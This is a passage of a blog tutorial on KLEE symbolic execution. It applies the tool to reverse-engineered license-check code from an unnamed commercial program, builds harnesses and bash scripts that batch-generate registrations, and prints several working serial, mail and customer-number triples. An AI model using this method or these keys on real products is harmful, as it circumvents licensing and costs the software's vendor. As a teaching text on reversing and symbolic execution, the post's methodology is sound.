KLEE: ERROR: /tmp/klee-uclibc/libc/stdlib/stdlib.c:526: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5756
KLEE: done: completed paths = 68
KLEE: done: generated tests = 68

And KLEE finds the possible out-of-bounds access in our program. Because you know, our program is bugged :) Before we jump in and fix our code, let me briefly explain what these new flags do:

  • --optimize: this is for dead code elimination. It is actually a good idea to use this flag when working with non-trivial applications, since it speeds things up;
  • --libc=uclibc and --posix-runtime: these are the aforementioned options for uClibc and POSIX runtime;
  • --sym-args 0 1 3: this flag tells KLEE to run the program with a minimum of 0 and a maximum of 1 argument, each at most 3 characters long, and to make the arguments symbolic.

Note that calling atoi brings the number of execution paths of our program to 68. Using many libc functions in our code adds complexity, so we have to use them carefully when we want to reverse complex functions.

Let's now make the program safe by adding a check on the number of command line arguments. Let's also add an assertion, because it is fun :)

#include <stdlib.h>
#include <assert.h>
#include <klee/klee.h>

int main(int argc, char* argv[]) {
    int result = argc > 1 ? atoi(argv[1]) : 0;
    if (result == 42)
        klee_assert(0);
    return result;
}

We could also have written klee_assert(result != 42) and gotten the same result. Whichever solution we adopt, we now have to run KLEE as before:

$ clang -emit-llvm -g -o atoi2.ll -c atoi2.c
$ klee --optimize --libc=uclibc --posix-runtime atoi2.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-6"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 53243904)
KLEE: ERROR: /work/atoi2.c:8: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5962
KLEE: done: completed paths = 73
KLEE: done: generated tests = 69

Here we go! We have fixed our bug. KLEE is also able to find an input to make the assertion fail:

$ ls klee-last/ | grep err
test000016.assert.err
$ ktest-tool klee-last/test000016.ktest
ktest file : 'klee-last/test000016.ktest'
args       : ['atoi.ll', '--sym-args', '0', '1', '3']
num objects: 3
...
object    1: name: 'arg0'
object    1: size: 4
object    1: data: '+42\x00'
...

And the answer is the string "+42"... as we know.
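
KLEE reports a single witness per failing path, so "+42" is just one of several strings of at most three characters that work. Here is a tiny sketch to check a few others natively, assuming the standard atoi behaviour of skipping leading whitespace and accepting an optional sign; the helper name parses_to_42 is mine.

```c
#include <stdlib.h>

/* Return 1 if the C library's atoi parses s to 42, 0 otherwise. */
int parses_to_42(const char *s) {
    return atoi(s) == 42;
}
```

For instance "42", " 42" and "042" are accepted as well, while "-42" is not.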

There are many other KLEE options and functionalities, but let's move on and try to solve our original problem. Interested readers can find a good tutorial, for example, in How to Use KLEE to Test GNU Coreutils.

KLEE keygen

Now that we know basic KLEE commands, we can try to apply them to our particular case. We have understood some of the validation algorithm, but we don't know the computation details. They are just a mess of arithmetical and logical operations that we are too tired to analyze.

Here is our plan:

  • we need at least a valid customer number, a serial number and a mail address;
  • more ambitiously we want a list of them, to make a key generator.

This is a possibility:

// copy and paste of all the registration code
enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;
// ...
enum result_t check_registration(int serial, int customer_num, const char* mail);
// ...

int main(int argc, char* argv[]) {
    int serial, customer, valid;
    char mail[10];
    enum result_t result;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    klee_make_symbolic(&customer, sizeof(customer), "customer");
    klee_make_symbolic(mail, sizeof(mail), "mail");

    result = check_registration(serial, customer, mail);
    // bitwise & on purpose: it does not add an extra branch
    valid = (result == VALID) & (license_type == PRO);
    klee_assert(!valid);
    return 0;
}

Super simple. Copy and paste everything, make the inputs symbolic and assert a certain result (negated, of course).

No! It's not that simple. This is actually the most difficult part of the game. First of all, what do we want to copy? We don't have the source code. In my case I used the Hex-Rays decompiler, so maybe I have cheated. When you decompile, however, you don't immediately get compilable C source code, since there could be dependencies between functions, global variables, and specific Hex-Rays types. For this latter problem I've prepared an ida_defs.h header, providing defines coming from IDA and from Windows headers.

But what to copy? The high level picture of the validation algorithm I have presented is an ideal one. The check_registration function is actually a big set of auxiliary functions and data, tightly coupled with other parts of the program. Even if we now know the most interesting functions, we need to know how much of the related code is actually needed. We cannot throw everything into our key generator, since every function brings along other related data and functions. In this way we would end up having the whole program in it. We need to minimize the code KLEE has to analyze, otherwise it will be too difficult for it to get its job done.

This is a picture of the high level workflow, as IDA proximity view proposes:

Known license functions

and this is the overview for a single node of this schema (precisely license_getType):

license_getType overview

As you can imagine, the complete call graph becomes really big in the end.

In the cleanup process, a large group of functions I removed is the one extracting and loading the table of valid mail addresses. To do this I stepped with the debugger until the table was completely loaded and then dumped the memory of the process. Then I used the nice "export to C array" functionality of HEX Workshop to export the memory of the mail table as actual code:

uint16_t hashHeader[8192] =
{
    0x0, 0x28, 0x12, 0x24, 0x2d, 0x2b, 0x2e, 0x23, 0x2b, 0x26,
    // ...
};
int16_t hashData[1000000] =
{
    15306, 18899, 18957, -24162, 63045, -26834, -21, -39653, 271441, -5588,
    // ...
};

But cutting out code is not the only problem I found in this step. External constraints must be carefully considered. For example, the time function can be handled by KLEE itself. KLEE tries to generate useful values even from that function. This is good if we want to test bugs related to a strange current time, but in our case, since the code will be executed by the program at a particular time, we are only interested in the value provided at that time. We don't want KLEE to treat this function as symbolic; we only want the right time value. To solve that problem, I have replaced all the calls to time with calls to a my_time function, returning a fixed value defined in the source code.
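
Such a replacement can be as small as the sketch below. The post does not show the original my_time, so both the signature (mirroring time) and the FIXED_TIME value are assumptions made for illustration.

```c
#include <time.h>

/* Hypothetical fixed timestamp (2015-01-01 00:00:00 UTC); the value that was
 * actually used is not given in the post. */
#define FIXED_TIME ((time_t)1420070400)

/* Drop-in replacement for time(): always returns FIXED_TIME, so the extracted
 * code sees one concrete value instead of something KLEE has to model. */
time_t my_time(time_t *out) {
    if (out != NULL)
        *out = FIXED_TIME;
    return FIXED_TIME;
}
```

Keeping the same signature as time means the extracted code only needs a search and replace on the function name.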

Another problem comes from the extraction of the functions from their outer context. Often code is written with implicit conventions in mind. These are not self-evident in the code because checks are avoided. A trivial example is the null terminator and valid ASCII characters in strings. KLEE does not assume those constraints, but the validation code does. This is because the GUI provides only valid strings. A less trivial example is that the mail address is always passed lowercase from the GUI to the lower level application logic. This is not self-evident if you do not follow every step from the user input to the actual computations with the data.

The solution to this latter problem is to provide those constraints to KLEE:

char mail[10];
char c;
size_t i;
klee_make_symbolic(mail, sizeof(mail), "mail");
for (i = 0; i < sizeof(mail) - 1; ++i) {
    c = mail[i];
    klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
}
klee_assume(mail[sizeof(mail) - 1] == '\0');

Logical operators inside klee_assume function are bitwise and not logical (i.e. & and | instead of && and ||) because they are simpler, since they do not add the extra branches required by lazy operators.
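
The two forms compute the same truth value, which can be checked exhaustively over every char. This is a small native sketch with no KLEE involved: the function names are mine, and I added extra parentheses to keep compilers quiet about mixing comparisons with & and |.

```c
#include <limits.h>

/* Branch-free form, as used inside klee_assume: every comparison yields
 * 0 or 1, and the bitwise operators combine them without short-circuiting. */
int allowed_bitwise(char c) {
    return ((c >= '0') & (c <= '9')) | ((c >= 'a') & (c <= 'z')) | (c == '\0');
}

/* Short-circuit form: same result, but each && and || is a potential branch. */
int allowed_logical(char c) {
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || c == '\0';
}

/* Return 1 if both predicates agree on every possible char value. */
int predicates_agree(void) {
    for (int v = CHAR_MIN; v <= CHAR_MAX; ++v) {
        if (allowed_bitwise((char)v) != allowed_logical((char)v))
            return 0;
    }
    return 1;
}
```

Since the result is the same, the choice between the two forms only affects how many branches the engine has to explore.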

Throw everything into KLEE

Having extracted all the needed functions and global data and solved all the issues with the code, we can now move on and run KLEE with our brand new test program:

$ clang -emit-llvm -g -o attempt1.ll -c attempt1.c
$ klee --optimize --libc=uclibc --posix-runtime attempt1.ll

And then wait for an answer.

And wait for another while.

Make some coffee, drink it, come back and watch the PC heating up.

Go out, walk around, come back, have a shower, and.... oh no! It's still running! OK, that's enough! Let's kill it.

Deconstruction approach

We have assumed too much from the tool. It's time to use the brain and ease its work a little bit.

Let's decompose the big picture of the registration check presented before piece by piece. We will try to solve it bit by bit, to reduce the solution space and so, the complexity.

Recall that the algorithm is composed of three main conditions:

  • serial number must be valid by itself;
  • serial number, combined with mail address has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

Can we split them in different KLEE runs?

Clearly the first one can be written as:

#include <assert.h>
#include <klee/klee.h>
// include all the functions extracted from the program
#include "extracted_code.c"

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

int main(int argc, char* argv[]) {
    int serial, valid;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    klee_assert(!valid);
}

And let's see if KLEE can work with this single function:

$ clang -emit-llvm -g -o serial_type.ll -c serial_type.c
$ klee --optimize --libc=uclibc --posix-runtime serial_type.ll
...
KLEE: ERROR: /work/symbolic/serial_type.c:17: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000019.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
ktest file : 'klee-last/test000019.ktest'
args       : ['serial_type.ll']
num objects: 2
object    0: name: 'model_version'
object    0: size: 4
object    0: data: 1
object    1: name: 'serial'
object    1: size: 4
object    1: data: 102690141

Yes! We now have a serial number that is considered PRO by our target application.

The third condition is less simple: we have a table that stores values matching mail addresses with serial numbers. The high level check is this:

int check(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

This piece of code imposes constraints on our mail address and serial number, but not on the customer number. We can rewrite the checks in two parts, the one checking the serial, and the one checking the mail address:

int check_serial(int serial) {
    int index = get_index_in_mail_table(serial);
    return index <= HEADER_SIZE;
}

int check_mail(char* mail, int index) {
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return 1;
    }
    return 0;
}

The check_mail function needs the index in the table as a secondary input, so it is not completely independent from the other check function. However, check_serial can be incorporated into the successful test program we used before:

// ...

int main(int argc, char* argv[]) {
    int serial, license_type, valid, index;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    // added just now
    index = get_index_in_mail_table(serial);
    valid &= index <= HEADER_SIZE;

    // KLEE reports an error (and a test case) when valid can be true
    klee_assert(!valid);
    return 0;
}

And if we run it, we get a revised serial number that satisfies the additional constraint:

$ clang -emit-llvm -g -o serial.ll -c serial.c
$ klee --optimize --libc=uclibc --posix-runtime serial.ll
...
KLEE: ERROR: /work/symbolic/serial.c:21: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000032.assert.err
$ ktest-tool --write-ints klee-last/test000032.ktest
...
object    1: name: 'serial'
object    1: data: 120300641
...

For those wondering whether get_index_in_mail_table could return a negative index, and so possibly crash the program: you are not alone. @0vercl0k asked me the same question, and unfortunately the answer is no. I tried, because I am a lazy ass, changing the assertion above to klee_assert(index >= 0), which fails only if a negative index is reachable, but KLEE never triggered it. I then manually checked the function's code and saw a beautiful if (result < 0) result = 0. So, the answer is no! You have not found a vulnerability in the application :(
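As an illustration of why the clamp closes that door, here is a small sketch. The arithmetic inside toy_index is made up (an assumption, not the application's code); only the final clamp mirrors the real function. The brute-force scan is a plain-C analogue of what KLEE answered symbolically.

```c
#include <assert.h>
#include <limits.h>

/* Hypothetical index computation; only the final clamp mirrors the
   `if (result < 0) result = 0` seen in the real function. */
int toy_index(int serial) {
    int result = serial / 1000 - 50;   /* may go negative before the clamp */
    if (result < 0)
        result = 0;
    return result;
}

/* Returns 1 if some serial in [lo, hi] yields a negative index, else 0. */
int finds_negative_index(int lo, int hi) {
    for (long long s = lo; s <= hi; ++s)
        if (toy_index((int)s) < 0)
            return 1;
    return 0;
}
```

Whatever happens before the clamp, nothing below zero can leave the function, so no input can turn the table lookup into an out-of-bounds read on the low side.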

For the check_mail solution we have to provide the index of a serial, but wait... we have it! We now have a serial, so computing its index in the table is as simple as executing this:

int index = get_index_in_mail_table(serial);

Therefore, given a serial number, we can solve the mail address in this way:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    unsigned i;
    char c;
    char mail[10];

    // mail is symbolic
    klee_make_symbolic(mail, sizeof(mail), "mail");
    for (i = 0; i < sizeof(mail) - 1; ++i)
    {
        c = mail[i];
        // only digits, lowercase letters, or NUL; bitwise & and | keep this a single expression
        klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | (c == '\0') );
    }
    klee_assume(mail[sizeof(mail) - 1] == '\0');

    // get serial as external input
    if (argc < 2)
        return 1;
    serial = atoi(argv[1]);

    // compute index
    index = get_index_in_mail_table(serial);
    // check validity
    valid = check_mail(mail, index);
    klee_assert(!valid);
    return 0;
}

We only have to run KLEE with the additional serial argument, passing the serial computed in the previous step.

$ clang -emit-llvm -g -o mail.ll -c mail.c
$ klee --optimize --libc=uclibc --posix-runtime mail.ll 120300641
...
KLEE: ERROR: /work/symbolic/mail.c:34: ASSERTION FAIL: !valid
...
$ ls klee-last/ | grep err
test000023.assert.err
$ ktest-tool klee-last/test000023.ktest 
...
object    1: name: 'mail'
object    1: data: 'yrwt\x00\x00\x00\x00\x00\x00'
...

OK, the mail found by KLEE is "yrwt". This is not a real mail address, of course, but the code has no proper validation requiring '@' and '.' characters, so we are fine with it :)
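For reference, the character constraint given to KLEE can be written as an ordinary predicate. This is a sketch (the function names are mine, not from the application) that uses the usual && and || operators. For 0/1 operands they give the same truth value as the bitwise & and | used in the harness, and as far as I understand KLEE's usual guidance, the bitwise form is preferred inside klee_assume so that short-circuit evaluation does not introduce extra branches.

```c
#include <assert.h>

/* Same character set as the klee_assume() in the harness: digits,
   lowercase letters, or the terminating NUL. */
int is_allowed_mail_char(char c) {
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || c == '\0';
}

/* Checks a whole buffer of `size` bytes the way the harness constrains it:
   every byte before the last one is allowed, and the last byte is NUL. */
int satisfies_mail_constraints(const char *buf, int size) {
    for (int i = 0; i < size - 1; ++i)
        if (!is_allowed_mail_char(buf[i]))
            return 0;
    return buf[size - 1] == '\0';
}
```

A 10-byte buffer holding "yrwt" followed by NULs passes, while anything containing '@' or '.' does not, which is why KLEE could never have produced a realistic-looking address with these assumptions.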

The last piece of the puzzle we need is the customer number. Here is the check:

int expected_customer = compute_customer_number(serial, mail);
if (expected_customer != customer_num)
    return INVALID;

This is simpler than before, since we already have a serial and a mail, so the only thing missing is a customer number matching those. We can compute it directly, even without symbolic execution:

int main(int argc, char* argv[])
{
    if (argc < 3)
        return 1;

    int serial = atoi(argv[1]);
    char* mail = argv[2];
    int customer_number = compute_customer_number(serial, mail);
    printf("%d\n", customer_number);
    return 0;
}

Let's execute it:

$ gcc customer.c -o customer
$ ./customer 120300641 yrwt
1175211979

Yeah! And if we try those numbers and mail address in the real program, we are now legit and registered users :)

Want more keys?

We have just found one key, and that's cool, but what about making a keygen? KLEE is deterministic, so if you run the same code over and over you will always get the same results. So, for now we are stuck with this single serial.

To solve the problem we have to think about what variables we can move around to get different valid serial numbers to start with, and with them solve related mail addresses and compute a customer number.

We have to add constraints to the serial generation, so that each run uses a slightly different version of the program and yields a different serial number. The simplest thing to do is to constrain get_index_in_mail_table to return an index inside a proper subset of the range [0, HEADER_SIZE] used before. For example, we can divide the range into equal chunks of size 5 and run the whole thing for every chunk.
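The chunk arithmetic is simple enough to sketch in a few lines. The helper names are hypothetical, and the bounds are half-open, matching an `index >= min && index < max` style of check.

```c
#include <assert.h>

/* Number of chunk start values min, min+step, ... that do not exceed max. */
int chunk_count(int min_index, int max_index, int step) {
    if (step <= 0 || max_index < min_index)
        return 0;
    return (max_index - min_index) / step + 1;
}

/* Half-open bounds [*lo, *hi) of the k-th chunk (k starts at 0). */
void chunk_bounds(int min_index, int step, int k, int *lo, int *hi) {
    *lo = min_index + k * step;
    *hi = *lo + step;
}
```

For instance, with a range of 0 to 8033 and a step of 5, there are 1607 chunks to try, and chunk number 481 covers the indices 2405 to 2409.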

This is the modified version of the serial generation:

int main(int argc, char* argv[]) {
    int serial, min_index, max_index, index, valid;

    // get chunk bounds as external inputs
    if (argc < 3)
        return 1;
    min_index = atoi(argv[1]);
    max_index = atoi(argv[2]);

    // serial is symbolic, as in the previous version
    klee_make_symbolic(&serial, sizeof(serial), "serial");

    // check and assert
    index = get_index_in_mail_table(serial);
    valid = index >= min_index && index < max_index;
    klee_assert(!valid);
    return 0;
}

We now need a script that runs KLEE and collects the results for all those chunks. Here it is:

#!/bin/bash

MIN_INDEX=0
MAX_INDEX=8033
STEP=5

echo "Index;License;Mail;Customer"

for INDEX in $(seq $MIN_INDEX $STEP $MAX_INDEX); do
    echo -n "$INDEX;"

    CHUNK_MIN=$INDEX
    CHUNK_MAX=$(( CHUNK_MIN + STEP ))
    LICENSE=$(./solve.sh serial.ll $CHUNK_MIN $CHUNK_MAX)
    if [ -z "$LICENSE" ]; then
        echo ";;"
        continue
    fi
    MAIL_ARRAY=$(./solve.sh mail.ll $LICENSE)
    if [ -z "$MAIL_ARRAY" ]; then
        echo ";;"
        continue
    fi
    MAIL=$(sed 's/\\x00//g' <<< $MAIL_ARRAY | sed "s/'//g")
    CUSTOMER=$(./customer $LICENSE $MAIL)

    echo "$LICENSE;$MAIL;$CUSTOMER"
done

This script uses the solve.sh script, which does the actual work and prints the result of the KLEE runs:

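#!/bin/bash
# do work: forward all arguments (bitcode file plus program arguments) to KLEE
klee "$@" >/dev/null 2>&1
# print result: locate the failing assertion and dump its test case
ASSERT_FILE=$(ls klee-last | grep '\.assert\.err$')
TEST_FILE=$(basename "klee-last/$ASSERT_FILE" .assert.err)
OUTPUT=$(ktest-tool --write-ints "klee-last/$TEST_FILE.ktest" | grep data)
RESULT=$(sed 's/.*:.*: //' <<< "$OUTPUT")
echo $RESULT
# cleanup: remove the output directory and the klee-last symlink
rm -rf "$(readlink -f klee-last)"
rm -f klee-last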
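The two text-munging steps done with sed in these scripts (keeping what follows the last ": " on a ktest-tool data line, and stripping quotes and literal \x00 escapes from the mail) are easy to get subtly wrong, so here is a rough C equivalent as a sketch. The function names are mine, and data_field only approximates the sed expression for lines of the form "object N: data: VALUE".

```c
#include <assert.h>
#include <string.h>

/* Returns a pointer to the text after the last ": " in `line`,
   or `line` itself when there is no ": " at all. */
const char *data_field(const char *line) {
    const char *last = NULL;
    for (const char *p = strstr(line, ": "); p != NULL; p = strstr(p + 1, ": "))
        last = p;
    return last ? last + 2 : line;
}

/* Copies `raw` into `out`, dropping single quotes and literal "\x00"
   escape sequences (four characters: backslash, x, 0, 0).
   `out` must have room for strlen(raw) + 1 bytes. */
void clean_mail(const char *raw, char *out) {
    while (*raw != '\0') {
        if (strncmp(raw, "\\x00", 4) == 0) {
            raw += 4;
        } else if (*raw == '\'') {
            raw += 1;
        } else {
            *out++ = *raw++;
        }
    }
    *out = '\0';
}
```

Note that the \x00 here is the printed escape that ktest-tool shows, not an actual NUL byte, which is why it can be matched as plain text.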

Here is the final run:

$ ./keygen_all.sh
Index;License;Mail;Customer
...
2400;;;
2405;115019227;4h79;1162863222
2410;112625605;7cxd;554797040
...

Note that not all the serial numbers are solvable, but we are OK with that. We now have a bunch of solved registrations. We can put them in some simple GUI that shows the user one of them at random.
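The "pick one at random" part needs nothing more than a table and rand(). A minimal sketch, using the three registrations shown in this post as data (the struct and function names are hypothetical):

```c
#include <assert.h>
#include <stdlib.h>

struct registration {
    int serial;
    const char *mail;
    int customer;
};

/* Registrations solved earlier in this post. */
static const struct registration solved[] = {
    { 120300641, "yrwt", 1175211979 },
    { 115019227, "4h79", 1162863222 },
    { 112625605, "7cxd", 554797040 },
};

enum { SOLVED_COUNT = sizeof(solved) / sizeof(solved[0]) };

/* Returns one of the solved registrations, chosen with rand().
   The caller is expected to seed the generator once with srand(). */
const struct registration *pick_registration(void) {
    return &solved[rand() % SOLVED_COUNT];
}
```

Seeding with something like srand((unsigned)time(NULL)) at startup is enough for this purpose, since the choice does not need to be unpredictable.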

That's all folks.

Conclusion

This was a brief journey into the magic world of reversing and symbolic execution. We started with the dream of making a key generator for a real-world application, and we ended up with a list of serial numbers to put in some nice GUI (maybe with some MIDI soundtrack playing in the background to drive users crazy). But this was not our purpose. The path we followed is far more interesting than ruining programmers' lives. So, just to recap, here are the main steps we followed to generate our serial numbers:

  1. reverse the skeleton of the serial number validation procedure, understanding data and the most important functions, using a debugger, IDA, and all the reversing tools we can access;
  2. collect the functions and produce a C version of them (this could be quite difficult, unless you have access to the Hex-Rays decompiler or a similar tool);
  3. mark some strategic variables as symbolic and mark some strategic code path with an assert;
  4. ask KLEE to provide us the values for the symbolic variables that make the assert fail, and so reach that code path;
  5. since the last step provides us only a single serial number, add an external input to the symbolic program, using it as additional constraint, in order to get different values for symbolic variables reaching the assert.

The last point may seem quite obscure, I admit, but the idea is simple. Since KLEE's goal is to reach a path with some values for the symbolic variables, it is not interested in exploring all the possible values. We can force this exploration manually by adding a constraint and varying a parameter from run to run, and (hopefully) get different correct values for our serial number.
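A toy analogue may make this less obscure. The sketch below is plain brute force, not symbolic execution, and the validity predicate is invented for the example. What it shares with KLEE is that the search is deterministic and stops at the first answer, so the only way to get a different answer is to change the window it searches in.

```c
#include <assert.h>

/* Hypothetical validity predicate standing in for the real serial check. */
int toy_is_valid(int serial) {
    return serial % 7 == 3;
}

/* Deterministic "solver": returns the first valid serial in [lo, hi),
   or -1 when the window contains none. */
int first_solution(int lo, int hi) {
    for (int s = lo; s < hi; ++s)
        if (toy_is_valid(s))
            return s;
    return -1;
}
```

Calling first_solution(0, 100) always gives 3, no matter how many times it is run. Narrowing the window to [10, 20) gives 10, [20, 30) gives 24, and [4, 10) gives nothing at all, which is the toy version of the chunks that produced no serial.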

I would like to thank @0vercl0k, @jonathansalwan and @__x86 for their careful proofreading and good remarks!

I hope you found this topic interesting. If so, here are some links that can help you dig deeper into some of the topics touched on in this post:

Source code, examples and scripts used to produce this blog post are published in this GitHub repo.

Cheers, @brt_device.
